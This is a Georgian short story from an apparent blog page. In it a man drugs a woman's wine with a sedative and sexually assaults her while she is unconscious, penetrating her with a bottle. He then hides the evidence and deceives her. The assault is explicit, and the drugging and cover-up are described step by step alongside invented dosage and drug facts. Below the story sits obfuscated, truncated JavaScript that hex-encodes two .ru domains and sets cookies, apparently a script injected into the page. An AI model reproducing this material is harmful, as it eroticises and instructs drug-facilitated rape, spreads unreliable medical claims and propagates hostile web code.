სანამ ნინია ტუალეტში იყო, ქრისტეფორემ ჯიბიდან ფსიქოტროპული წამლების აფთიაქში ნაყიდი (ნანეტში, ზოგიერთ აფთიაქში, დანიშნულების გარეშეც მოგყიდიან ფსიქოტროპულ წამალს, კანონის გამკაცრებამ შავ ბაზარს დიდად მაინც ვერ უშველა) ნერვოპამის დაფხვნილი აბი ამოიღო და გოგოს ღვინოში ჩაუყარა. შემდეგ ღვინო თითით მოურია და სველი ნეკი შარვალზე გაიმშრალა.
ნევროპამი ფარმაციაში, მე რაც გამიგია, ყველაზე ძლიერი საძილე საშუალებაა. ნარკოტიკულ ნივთიერებებს არ შეიცავს მაგრამ, ბლომად ბენზოდიაზეპინი შედის და ამიტომაც ყველაზე ეფექტური ტრანკვილიზატორია – დიაზეპამი არაფერია მაგასთან შედარებით. მიღების შემდეგ, პაციენტის ტვინის რამდენიმე უბანზე ეს ბენზოდიაზეპინი იწყებს ზემოქმედებას, ძალიან მალე კი ტკივილის ცენტრიც ითიშება, კუნთების ტონუსიც ქვეითდება და ემოციებიც ნელდება. მკვდარივით აგდიხარ რა! ფსიქიკური ავადმყოფების გარდა, ექიმები ამ წამალს ნარკოზის მოშიში ადამიანებისთვის მიმართავენ ხოლმე. პატარა ოპერაციების დროს. მაგრამ ყველა მაინც ნარკოზს ამჯობინებს, იმიტომ, რომ ამას რამდენიმე ცუდი გვერდითი მოვლენა ახასიათებს: ძილიდან გამოსვლის შემდეგ, სადღაც ხუთი წუთის განმავლობაში საშინელი კრუნჩხვები გაქვს – ბენზოდიაზეპინი ნორმას რომ აჭარბებს, საპირისპირო ეფექტს იწვევს და მაგიტომ. კრუნჩხვების გარდა, თავის საშინელი ტკივილი იცის და პოსეპილეფტურ პერიოდში, გონს რომ მოხვიდე ცოტა დროც გჭირდება. ამასობაში სუნთქვის ფუნქცია ირღვევა, მოძრაობის კოორდინაცია ირღვევა და – დოზა თუ ძაან ცოტა არაა – მიმღები აგღზნებულიც კი რჩება ხოლმე. ერთი აბი 90 მილიგრამ ბენზოდიაზეპინს შეიცავს, მაშინ როცა 60 მილიგრამი ჩვეულებრივი პაციენტისათვის სრული სადღეღამისო ნორმაა. სადღაც სამოცი-სამოცდახუთი წუთის განმავლობაში ითიშები ერთი აბის მიღებისას. უკიდურეს შეთხვევაში, მაქსიმუმ სამი აბია რეკომენდირებული, მაგრამ ძალიან იშვიათია მსგავსი ფაქტები. ზოგი ადამიანი ორ აბსაც კი ვერ უძლებს. ამიტომაც, სანამ ექიმი ნევროპამის გამოწერის გადაწყვეტილებას მიიღებს, ნერვული და სისხლძარღვთა სისტემა უნდა შეამოწმოს კარგად. არასწორად თუ დადგინდა დოზა, ყველაზე კარგ შეთხვევაში პაციენტს წნევა დაუვარდება სრულად და მერე ეგრევე მაგრად მოემატება, რაც ასიდან ოთხმოცდაცხრამეტ შემთხვევაში ინფრაქტის მიზეზი ხდება. მოკლედ, მაგარი ნაბიჭვრობა წამალია რა. ქრისტეფორემ ნინიას ჯანმრთელობაზე არაფერი იცოდა და კარგად ხვდებოდა, რომ მაგრად რისკავდა.
ტუალეტიდან ჯერ ჩარეცხვის ხმა მოისმა, შემდეგ კი დეზადორის.
გოგომ ხელები გადაიბანა, ცისფერი პირსახოცით გაიმშრალა და გამოვიდა.
მაგიდასთან ღიმილით დაჯდა და ღვინო მოწიწებით აიღო.
– ამ წმინდა სასმელით ჩვენს გაცნობას გაუმარჯოს – ჭიქა ასწია ქრისტეფორემ და გოგოს მიუჭახუნა. – მადლობა უფალს, რომ ერთმანეთს შეგვახვედრა.
ორივემ ერთად გამოცალა კანას ქორწილის ტკბილი სითხე.
ქრისტეფორეს სახეზე დიდი ღიმილი ამოუვიდა.
– დაიცა, ჩანთაში რაღაც მაქვს – თქვა ნინიამ და შემოსასვლელში გავიდა. რამდენიმე წამის შემდეგ ხელში ორი პატარა სეფისკვერით დაბრუნდა.
– აუ, როგორ მიყვარს სეფისკვერი – ბუნებვრივი აღფრთოვანება გამოუვიდა ქრისტეფორეს.
– ჰო, მეც ძალიან მიყვარს. ზოგჯერ სახლშიც ვაცხობ ხოლმე.
– რა კარგია. კურთხევა ხომ გაქვს?
– რა კურთხევა?
– არ იცი? სახლში სეფისკვერების გამოცხობა კურთხევის გარეშე არ შეიძლება. ჩემმა მეგობარმა გამოაცხო ერთხელ და მამაოს რომ მიართვა რამდენიმე საჩუქრად, იმან უსაყვედურა. ჰოდა მერე აიღო კურთხევა და ახლა ისევ აცხობს.
გოგო გაშრა. ისეთი შეგრძრნება დაეუფლა, გეგონება რაიმე მომაკვდინებელი ცოდვა ჩაიდინაო.
– ვაიმე, არ ვიცოდი. უფალო მაპატიე! – ნინია ხატებისკენ პირჯვრისწერით წავიდა.
– კარგი არაუშავს, ასე ცუდადაც არ არის საქმე. შემდეგ კვირას კურთხევა აიღე მამა კალისტრატესგან და ყველაფერი კარგად იქნება. არცოდნა არცოდვაა!
– ჰო, აუცილებლად ავიღებ. არ ვიცოდი. ვაიმე, როგორ შევცოდე.
– კარგი დაწყნარდი, ასე ძაან ნუ აღელდები – უთხრა და ხელი მხარზე მოჰხვია. ალბათ მის ცხოვრებაში პირველად ხდებოდა, რომ ბიჭს ხელი მის მხარზე ჰქონდა მოხვეული თუმცა ანერვიულებულმა გოგომ, ეს ვერ გააცნობიერა, ამას ისიც დაემატა, რომ წამალმა მოქმედება დაიწყო. გოგო თავს შეუძლოდ გრძნობდა.
ნინია გაითიშა და ლამის ძირს დაეცა. ქრისტეფორემ ხელი შეაშველა და გოგონა საწოლზე გადააწვინა. ამრეზით უყურებდა საწოლზე მიგდებულ ნინიას – ოჯახის სიამაყესა და უმანკოების დოკუმენტს. უნდოდა მივარდნოდა და ყელი გამოეღადრა, მაგრამ მკვლელობა არ იყო ქრისტეფორეს საქმე;
ბიჭმა გოგოს ტანსაცმლის გახდა დაუწყო. ნინიას უგემოვნო ატლასის ბლუზის ქვეშ ასევე უგემოვნო თეთრი ლიფი ეცვა. ლიფში დაახლოებით ზომით ოთხი ნომერი ორი ცალი ხელუხლებელი ძუძუ იდო. არადა გოგო უკვე ოცდაშვიდი წლის იყო. როდესაც ტანი მთლიანად გაუშიშვლა, ჯერი კაბაზე გადავიდა. ჯინსის ქვედაბოლო, რომელიც მუხლებს ცოტათი ჩამოცდენოდა, მთლიანად გახადა. ცელოლიტით გალურჯებული ხორკლიანი ბარძაყების დანახვაზე ქრისტეფორე დაიჭყანა, თუმცა წინ გულის რევა იყო, როცა უკვე თეთრი ტრუსიკი ჩამოუწია და იქიდან შერვუდის ტყის ბინადრებმა არც თუ ისე მეგობრული სალამი მისცეს.
ბიჭს გინება წამოსცდა და სახე შეატრიალა, რომ ცოტა ხნით არ შეეხედა ამ სიბინძურისათვის. აშკარა იყო, რომ ნინია ჰიგიენასთან მწყრალად იყო.
დაახლოებით ოც წამში, როცა სული მოითქვა, ადგა და ნინიას ტრაკქვეშ ჯერ ორი დიდი ცელოფნის პარკი, მერე კი წითელი პირსახოცი დააფინა. შემდეგ შერვუდი გადაწია და ხვრელში ნერწყვით დასველებული თითი შეყო. ნინიამ ძილში ყრუდ ამოიგმინა ტკივილისგან – როგორც ჩანს ნერვოპამს ჯერ ბოლომდე არ ემოქმედა. ქრისტეფორემ თითი ვაგინის ბაგეებს შორის მოატარა, რათა აპკთან სივრცე ცოტა გაეფართოებინა. ცდილობდა ყველაფერი ისე გაეკთებინა, რომ გული არ არეოდა. გოგოს სუნთქვა გახშირებოდა. როცა ადგილი საკმარისად გაფართოვდა, ქრისტეფორემ ის ღვინის ბოთლი აიღო, რომელზეც დაკრული იყო ეტიკეტი წარწერით „Cana Wine“ და ბაგეებს შორის თითის ნაცვლად ბოთლი გამოუსვა.
ბოთლით აპკი გახია. გოგომ უხმოდ შეკრთა. ვაგინიდან წლების განმავლობაში დაგუბებულმა სისხლმა დაიწყო დენა, რომელიც რამდენიმე წამს გაგრძელდა. მერე ქრისტეფორემ ვაგინა მოუწმინდა, ჯიბიდან ტამპონი ამოიღო და ნაპრალში შეუყო.
სანამ ნინიას ტამპონი ედო, ბიჭმა ჭიქით თბილი წყალი მოიტანა და ზიზღით მობანა ბოქვანი, თმიდან სისხლის წებოვნება რომ გაექრო. შემდეგ გოგოს შერვუდი აუჩეჩა, რომ გაემშრალებინა. ჩეჩვისას ერთი ორი წვეთი შეესხა და კიდევ გმირულად გაუძლო გულის რევას.
ხუთი წუთის მერე ნაპრალიდან სისხლიანი ტამპონი გამოუღო, ადგილი ისევ საგულდაგულოდ მოუწმინდა, სანამ არ დაწრმუნდა, რომ სისხლის კვალი გამქრალი იყო და ტრუსიკი ჩააცვა. ტრუსიკს დანარჩენი ტანსაცმელებიც მოაყოლა.
გოგოს ჯერ არ გაeღვიძებოდა. ამიტომაც ქრისტეფორემ ყველანაირი ნივთმტკიცების მოშორება გადაწყვიტა. ჯერ ბოთლს მობანა სისხლი და ისევ მაგიდაზე დადო. შემდეგ კი შავ ცელოფნის პარკში ტამპონი, პირსახოცი, ცელოფნის პარკები და „ქაღალდის“ ხელსახოცები ჩააგდო, გარეთ გავიდა და სისხლიან მატერიებს ნაგავში გადაუძახა.
უკან როცა დაბრუნდა, ოთახში ყველაფერი გადაამოწმა, რაიმე ხომ არ დარჩენოდა. როცა დარწმუნდა, რომ ყველაფერი ისევ ისე იყო, როგორც ნინიას ჩაძინებამდე, საათს დახედა, ნერვოპამს სამოქმედოდ ალბათ ხუთი წუთი თუ ექნებოდა დარჩენილი.
ამ დროს ნინიას კრუნჩხვები დაეწყო და პირიდან დუჟი წამოუვიდა. ქრისტეფორე გოგოს ზედ გადააწვა, რათა აკანკალებული სხეული გაეკავებინა, პარალელურად დუჟს წმენდა დაუწყო.
გოგოს კრუნჩხვები დიდხანს გაუგრძელდა, რაც იმის ბრალი იყო, რომ ბენზოდიაზეპინი ალკოჰოლთან ერთად შევიდა რეაქციაში. ასეა თუ ისე, ნინიამ გმირულად გაძლო. დუჟის დენა რომ მორჩა და გამოფხიზლება დაიწყო, ქრისტეფორემ ლორწოიანი ხელსახოცები საწოლის ქვეშ შეაგდო, შემდეგ კი გოგოს ძლიერი სილა გააწნა.
ნინიამ თვალები გაახილა, მაგრამ მთლიანადაც ვერ გამოსულიყო ძილიდან.
– ნინია, ნინია, ხმა გამეცი, რა მოგივიდა – გაუჩერებლად ყვიროდა ქრისტეფორემ, გოგო რომ გაეღვიძებინა. მისი თავი ხელში ეჭირა და აქანავებდა.
გოგო დაახლოებით ნახევარ წუთში გამოფხიზლდა.
– რა მოხდა? – იკითხა დაბნეულმა
– არ ვიცი, ვლაპარაკობდით და უცბად გული წაგივიდა.
ნინია ჯერ ვერ გამორკვეულიყო მდგომარეობიდან.
– რაა? გული წამივიდა? როდის?
– ასე ერთი წუთის წინ. გიყვიროდი, განჯღრევდი რომ გამოფხილებულიყავი, მაგრამ მხოლოდ კვნესოდი. ბოლოს, მაპატიე მაგრამ, ოდნავი სილაც გაგაწანი, რომ გამოგღვიძებოდა. ძალიან დიდი ბოდიში, მაგრამ ძალიან შემეშინდა. შენ რომ რამე მოგსვლოდა…
ქალი ხმას ვერ იღებდა. თავს უცნაურად გრძნობდა.
– სასწრაფოს გამოვუძახებ – უთხრა ქრისტეფორემ, თუმცა წინასწარვე იცოდა, რომ გოგო კატეგორიულ უარს ეტყოდა. სასწრაფო რომ აქ მოსულიყო, მაშინ ამბავი ოჯახის წევრებამდეც მივიდოდა. ოჯახის წევრები კი როცა გაიგებდნენ რომ ნინია ვიღაც ბიჭთან სახლში ღვინოს სვამდა, კარგი დღე არ დაადგებოდა.
– არა, არ არის საჭირო, უკეთ ვარ.
– დარწმუნებული ხარ? ხომ არ ჯობია მაინც რომ გამოვიძახო?
– არა არა. დარწმუნებული ვარ. კარგად ვარ უკვე – თქვა გოგომ და ნაძალადევად გაიღიმა.
გოგო კარგად არ იყო, მაგრამ სასწრაფოს მოსვლა არ უნდოდა, ზუსტად იმ მიზეზის გამო, რასაც ქრისტეფორე ფიქრობდა.
– მაშინ აფთიაქში ჩავალ, რაიმე წამალს ამოგიტან.
– არა, არ მინდა. დიეტაზე ვარ, დღეს არაფერი მიჭამია და ალბათ ამის გამო გავითიშე უცებ. წავალ რა.
– ცოტა ხანი მოისვენე, ახლა აღელვებული ხარ. ისე არაა კარგი ასეთი დიეტა. საჭმელს მოგიტან, მიირთვი რამე.
– არა არა, წავალ.
– ცოტა შეგეჭამა რამე და ისე წასულიყავი არ ჯობდა?
– არა, ლაშ, ბოდიში რა, ისედაც შეგაწუხე. წავალ ახლა მე.
– კარგი მაშინ, მანქანით გაგაცილებ.
– კაი. ოღონდ კორპუსამდე ნუ მიხვალ. არ მინდა მეზობლებმა დამინახონ.
– კიბატონო.
– დარწმუნებული ხარ რომ არც სასწრაფო გინდა და არც წამალი?
– არა-მეთქი ვერ გაიგე? – ხმამაღლა გამოუვიდა გოგოს, რის გამოც მაშინვე მოუბოდიშა ბიჭს.
ქრისტეფორე გოგოს წამოდგომაში მოეხმარა. რამდენიმე ნაბიჯის გავლის მერე ცოტა გონს მოეგო.
– ტუალეტში შევალ, სახეზე წყაალს შევისხავ – უთხრა ბიჭს.
ტუალეტიდან გამოსულმა თავისი ჩანთა აიღო და ქრისტეფორესთვის არც არაფერი უთქვამს ისე გავიდა სახლიდან. ქრისტეფორე სადარბაზოში დაეწია. შემდეგ მანქანაში ჩასხდნენ და დაძრეს. ხმას არცერთი იღებდა. ნინია თავისი სახლისკენ ასწავლიდა გზას. მანქანა ორი კორპუსით წინ გააჩერებინა.
– ბოდიში, არ ველოდი დღევანდელი დღე ასე თუ დამთავრებოდა. არადა ჯერ მხოლოდ სამი საათია. – უთხრა ქრისტეფორემ.
– არა არა, არაფერია საბოდიშო, ჩემი ბრალია ყველაფერი. არ უნდა წამოვსულიყავი. სულელი ვარ. შენც შეგაშინე.
ქრისტეფორემ აღარ გაუბა გრძელი საუბარი, ჩქარა უნდოდა მოეშორებინა გოგო.
– არაუშავს. მთავარია ახლა ყველაფერი კარგადაა. კიდევ შევხვდეთ?
– არ ვიცი. კი შევხვდეთ.
– შენი ნომერი მომეცი. საღამოს დაგირეკავ, მოგიკითხავ.
ნინიამ ქრისტეფორეს მობილურში თავისი ნომერი აკრიფა. ქრისტეფორემ ნომერი ნინიას თვალწინ შეინახა.
– დიდი მადლობა, რომ ჩემთან სახლში ამოხვედი.
– ნახვამდის – ცოტა განაწყენებულმა უპასუხა გოგომ.
– ნახვამდის.
ნინიამ კარები მიკეტა და სახლისკენ დაიძრა. ქრისტეფორემ უკუსვლით დაძრა მანქანა და ერთ წუთში უკვე ნინიას უბნიდან გასული იყო.
***
ნინია მთვრალივით მიდიოდა სახლში, თუმცა კორპუსის წინ დადგა თუ არა და მეზობლები დაინახა სახეზე ნაძალადევი ღიმილი კიდევ ერთხელ, რაც შეიძლება ბუნებრივად ამოიყვანა.
– გამარჯობა ნელი დეიდა.
– გაგიმარჯოს შვილო. ეკლესიიდან მოდიხარ?
– დიახ ნელი დეიდა. ეკლესიაში ვიყავი და მერე მეგობართან გავედი ცოტა ხნით.
– იცოცხლე შვილო იცოცხლე.
სახლში არაფერი შეიმჩნია. მაშინვე სამზარეულოში შევიდა, შეჭამა. მერე ცოტა ხანს ოჯახის წევრებთან ერთად ლაპარაკობდა, შემდეგ კი მოიმიზეზა ეკლესიაში ცოტა დავიღალეო და დასასვენებლად წამოწვა.
საკუთარ ოთახში ჩაკეტილი, ჯერაც ვერ ხვდებოდა, რა მოხდა. რა უნდა ყოფილიყო მისი ასეთი უცნაური გრძნობის მიზეზი. ნეტავი როდის გაიგებდა?! თუმცა, რა მნიშვნელობა აქვს. როცა ყველაფერს მიხვდებოდა, მაინც ჩუმად თავისთვის შეინახავდა ამ ამბავს. თავზე ლაფს არ დაისხამდა.
***
ქრისტეფორემ ნაქირავები ბინიდან ხატები ჩამოხსნა და მანქანაში ჩაიტანა. ბინის გასაღები კარის წინ, ტილოს ქვეშ შეაცურა და წამოვიდა. ხატები, წიგნი და ფსკვნილი ყველაზე ახლოს მდებარე ეკლესიასთან დატოვა ჩუმად.
საღამოს დამირეკა. ეზოში ჩავედი და მანქანის გასაღები გამოვართვი. აშკარად ეტყობოდა, რაღაც ვერ იყო ხასიათზე.
როგორ ჩაიარა-მეთქი რომ ვკითხე, არაფრის თქმა არ უნდოდა, გულის რევის შეგრძნება მაქვსო მითხრა და გამეცალა. თუმცა მანდვილად ვიცი სინდისის ქენჯნა ერთხელაც არ უგრძვნია.
ძალიან მალე ავიდა სახლში. იმაზე ფიქრობდა, თუ რა საზიზღრობა გააკეთა დღეს, მაგრამ ჯერ სად ხართ, მაგის მერე ისეთი ქნა, ეს რა მოსატანია?!
რა თქმა უნდა, არც იმ დღეს და არც იმის მერე ნინიასთვის არ დაურეკავს. მისი ნომერიც წაშალა მობილურიდან და არც ეკლესიაში გამოჩენილა.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

დატოვე კომენტარი

დატოვე კომენტარი

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s

%d bloggers like this: